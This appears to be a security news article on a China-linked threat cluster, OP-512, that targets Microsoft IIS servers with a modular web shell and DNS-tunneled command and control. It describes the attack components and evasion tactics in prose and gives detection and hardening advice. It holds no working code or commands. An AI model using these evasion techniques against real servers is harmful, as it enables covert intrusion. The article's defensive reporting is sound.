A newly identified China-linked threat cluster, tracked as OP-512, is actively targeting Microsoft Internet Information Services (IIS) web servers with a custom three-part web shell framework that leverages DNS for stealthy command-and-control (C2) communication. The campaign, disclosed by ReliaQuest on June 5, 2026, poses a critical risk to Windows Server environments, with attackers able to maintain persistence for up to 75 days before detection.

OP-512’s methodology represents an evolution in web shell attacks, moving beyond single-file payloads to a modular architecture designed to evade endpoint detection and response (EDR) solutions. The use of DNS tunneling for exfiltration and command delivery further complicates network-based defenses, making this a formidable threat for organizations running public-facing IIS applications.

The Rise of OP-512: A Persistent Threat Actor

ReliaQuest’s investigation links OP-512 to a broader Chinese espionage ecosystem, noting overlaps in tooling and tactics with previously observed state-sponsored groups. The threat cluster focuses on intelligence gathering, primarily targeting sectors that rely on Windows-based web infrastructure. While the full extent of the campaign remains under analysis, initial findings indicate a preference for exploiting known vulnerabilities in IIS and associated components such as ASP.NET and Exchange Server.

The group’s operational security includes the use of compromised legitimate domains and dynamic DNS services to route traffic through a layered proxy network. This infrastructure supports a “low-and-slow” approach, where attackers limit their activity to avoid triggering anomaly-based alerts.

Anatomy of a Three-Part Web Shell Framework

Traditional web shells are single script files—often written in PHP, ASP, or JSP—that provide an attacker with a web-based interface for executing commands, uploading files, and managing the compromised server. OP-512, however, deploys a tri-component framework that separates concerns and makes forensic analysis more difficult.

1. Dropper and Loader

The initial component is a lightweight dropper, typically delivered via an IIS vulnerability such as CVE-2022-21881 or through a vulnerable Exchange Server instance. The dropper’s sole purpose is to fetch and assemble the core shell from remote sources, often using encrypted DNS TXT records to retrieve encoded payloads. By leveraging DNS, the dropper avoids traditional HTTP-based C2 detection systems.

2. Core Web Shell Module

Once loaded, the core module provides a minimalistic management interface. Unlike common web shells that offer a broad set of functions, this module is stripped down to only essential commands: directory traversal, file read/write, process creation, and database interaction. Its code is heavily obfuscated using XOR encoding and is compiled into a .NET assembly to evade static analysis.

3. DNS Communication Proxy

The third component is a dedicated DNS proxy that handles all C2 traffic. Commands are embedded within DNS queries to attacker-controlled nameservers, with responses packed into TXT or A records. This technique allows the shell to bypass firewalls and web application firewalls (WAFs) that typically allow DNS traffic on port 53. The proxy also supports DNS over HTTPS (DoH) for additional concealment against network monitoring tools.

DNS Hiding: A Stealthy C2 Channel

DNS tunneling is not new, but OP-512’s implementation demonstrates advanced capability. Each request uses a unique subdomain pattern based on a time-based seed, making it difficult to blacklist domains. Data is encrypted with a rotating key derived from server-specific attributes, ensuring that even if a single session is captured, it cannot be decrypted without the host’s state.

Moreover, the attackers use a fallback mechanism: if DNS tunneling is disrupted, the shell can switch to HTTPS communication using forged certificates that mimic legitimate services. This adaptability highlights the actor’s focus on resilience.

The 75-Day Risk Window

One of the most alarming findings is the campaign’s ability to remain undetected for an average of 75 days. ReliaQuest traced the initial compromise vectors to months-old exploits, with evidence that attackers selectively reactivate dormant shells to minimize their footprint. The long dwell time allows for lateral movement, credential dumping, and sensitive data exfiltration over an extended period.

Windows Server administrators often overlook IIS-specific logging, relying on default Windows event logs that may not capture web shell activity in detail. OP-512 takes advantage of this gap by manipulating IIS logs and clearing PowerShell logs to erase traces of their actions.

Impact on Windows Server Environments

IIS remains a cornerstone of many enterprise infrastructures, hosting everything from internal portals to public-facing web applications. Compromise of an IIS server can provide a foothold into the broader Active Directory environment. From there, attackers can abuse Kerberos authentication, move to domain controllers, and establish persistent access.

OP-512’s focus on DNS-based communication is particularly dangerous because DNS is rarely subjected to deep packet inspection in many organizations. This blind spot allows the web shell to operate unimpeded, even in environments with robust perimeter security.

Detection and Mitigation Strategies

Defending against a threat like OP-512 demands a layered approach that goes beyond signature-based antivirus.

Monitor DNS Traffic

Implement DNS logging and analysis for anomalous patterns, such as unusually long TXT records, high volume of queries to a single domain, or queries to recently registered domains. DNS firewalls and threat intelligence feeds that block known malicious domains can also help.

Harden IIS Configuration

  • Apply the latest security patches for IIS and related components immediately.
  • Disable unnecessary IIS modules and ISAPI filters.
  • Use application pools with limited service accounts and restrict write permissions on web directories.
  • Enable advanced logging for IIS to capture POST request data and response codes.

Deploy Endpoint Detection

Employ EDR solutions that can detect in-memory .NET assemblies and suspicious process creations from w3wp.exe (the IIS worker process). Monitor for unusual child processes, such as cmd.exe or powershell.exe spawning under w3wp.exe.

Review and Isolate

Conduct regular forensic reviews of IIS servers, focusing on the inetpub directory, temporary ASP.NET files, and any unknown .dll or .aspx files. Network segmentation should isolate web servers from the internal network when possible.

Microsoft’s Security Recommendations

Microsoft has long provided guidance for securing IIS servers in its environment. Key recommendations include:
- Using IIS Crypto to disable outdated protocols and ciphers.
- Enabling Windows Defender Antivirus with cloud-delivered protection.
- Implementing AppLocker or Windows Defender Application Control to block untrusted executables.
- Simulating attacks with tools like Attack Surface Analyzer to identify misconfigurations.

For organizations using Exchange Server, the urgency is even higher, as OP-512 likely uses known Exchange vulnerabilities for initial access. The Exchange Server health checker script should be run regularly to assess risk.

Forward Outlook

OP-512 reflects an ongoing shift toward modular, difficult-to-detect web shells that leverage mundane protocols like DNS. As defenders improve their ability to detect HTTP-based shells, threat actors will continue to innovate. The 75-day dwell time suggests that many organizations are still unprepared to spot these intrusions early.

Windows administrators must treat IIS as a critical attack surface and invest in continuous monitoring, regular patching, and advanced threat detection tailored to web server workloads. The ReliaQuest disclosure should serve as a wake-up call to reassess the security posture of all public-facing Windows servers before attackers exploit the next window of opportunity.

For the latest updates on this campaign and indicators of compromise (IOCs), monitor the ReliaQuest threat intelligence portal and Microsoft Security Response Center (MSRC) bulletins.